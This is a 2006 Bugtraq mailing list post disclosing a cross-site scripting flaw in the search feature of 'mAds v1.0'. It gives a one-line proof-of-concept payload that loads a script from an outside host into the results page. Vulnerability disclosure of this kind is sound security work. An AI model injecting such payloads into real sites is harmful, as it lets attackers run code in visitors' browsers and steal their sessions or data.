Home page logo

bugtraq logo Bugtraq mailing list archives

mAds v1.0
From: lunY () youfucktard com
Date: 30 Jun 2006 23:11:01 -0000

mAds v1.0


Affected files:



XSS vuln when searching:

Like the hotbot XSS vuln, when searching mAds returns with its results they are generated dynamically on screen, with 
no filtering at all. For a PoC as your search string put in:

<script src=http://www.youfucktard.com/xss.js></script>



Im sure other vulnerabilities aside from XSS could be also possible due to this.

  By Date           By Thread  

Current thread:
  • mAds v1.0 lunY (Jul 01)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]